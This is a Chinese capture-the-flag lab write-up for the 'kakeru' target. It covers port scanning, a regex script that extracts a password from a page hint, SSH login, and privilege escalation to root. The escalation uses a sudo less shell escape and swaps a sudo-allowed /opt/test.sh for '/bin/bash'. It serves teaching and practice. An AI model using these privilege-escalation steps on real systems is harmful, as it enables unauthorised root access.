kakeru靶场学习笔记

正文

kali攻击机地址:192.168.1.4

靶场地址:192.168.1.23

1、端口扫描

bash 复制代码
nmap -sV -v -T4 -A 192.168.1.23

开放22和80端口

2、代码审计

访问80端口,通过curl命令知道用户名:

网页给了一个正则提示:

利用这个正则提示pattern,去匹配Login Request Example中的内容:

编写1.pyexp脚本:

python 复制代码
import re
pattern = r'(?<=x-).+(?=en)'
pattern = re.compile(pattern)

text = '''
POST /login HTTP/1.1
Host: 192.168.3.132
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0)
Gecko/20100101 Firefox/137.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://192.168.3.132
Connection: keep-alive
Referer: http://192.168.3.132/
Cookie: PHPSESSID=eiag23f4enj5tfcpl7t1qhhk2t
Upgrade-Insecure-Requests: 1
Priority: u=0, i
username=admin&amp;password=admin</pre
'''
data = pattern.findall(text)
# print(data)
print(''.join(data))

拿到密码:

bash 复制代码
www-form-url

ssh登录:

bash 复制代码
ssh welcome@192.168.1.232
bash 复制代码
sudo -h Dashazi -u kakeru /usr/bin/less /etc/passwd
!bash

3、Linux备份文件审计

查看sudoers.bak,发现提示:

内容 含义
welcome 普通用户 welcome
Dashazi=(kakeru) 在主机 Dashazi 上,可切换为 kakeru 用户执行命令
NOPASSWD: 执行这条 sudo 命令不需要输密码
/usr/bin/less 仅允许执行 /usr/bin/less 这一个命令
kakeru 用户 kakeru
ALL=(ALL:ALL) 可切换为任意用户(包括 root) 执行命令
NOPASSWD: 无需密码
/opt/test.sh 仅允许执行 /opt/test.sh 脚本

4、less提权

less提权流程:

  1. sudo 运行 less(合法)
  2. less 成功打开文件
  3. ! 执行 bash → 拿到 kakeru 权限
bash 复制代码
sudo -h Dashazi -u kakeru /usr/bin/less /etc/passwd
!bash

可以看到/home/kakeru 文件夹、test.sh文件有改写的权限:

5、tesh.sh脚本替换,写入bash命令提权

看到 /home/kakeru 文件夹是有写权限的,那么就直接换掉test.sh
方法(1):删除替换

bash 复制代码
rm -rf ./test.sh
echo "/bin/bash" > test.sh
chmod +x test.sh
sudo -u root /opt/test.sh
id


方法(2):移动替换

bash 复制代码
mv test.sh 66
echo "/bin/bash" > test.sh
chmod +x test.sh
sudo -u root /opt/test.sh
id
相关推荐
Go-higher27 分钟前
DriverTest 驾考知识卡片学习助手 —— 一款基于 Jetpack Compose 的现代 Android 学习APP
android·学习
星幻元宇VR39 分钟前
公共安全主题展厅设备【防洪防汛安全科普系统】
科技·学习·安全
AI科技星1 小时前
32维超复数流形中意识信息场与物质耦合的拓扑动力学
人工智能·学习·算法·数据挖掘·回归·乖乖数学·全域数学
鱼很腾apoc1 小时前
【Linux】第7期 进程间通信 (IPC) 详解:管道 (匿名 / 命名) + System V
linux·服务器·c语言·学习·进程间通信·ipc
半导体守望者2 小时前
MKS C系列MFC CMA10 CMA50快速紧凑型手侧与PC联网教程软件驱动USB
经验分享·笔记·功能测试·自动化·制造
小c君tt2 小时前
QT笔记记录
开发语言·笔记·qt
科技大视界2 小时前
大学生专业课笔记本用哪款?来酷Air14酷睿版14英寸轻薄笔记本电脑适合学习任务多的人
学习
weixin_423533993 小时前
c++类的继承学习-去中心化交易所(DEX)的“流动性池初始化与交易指令”设计
c++·学习·去中心化
远离UE43 小时前
UE5 各类型灯光学习
学习·ue5
New农民工3 小时前
射频芯片学习-dBm概念
学习·射频学习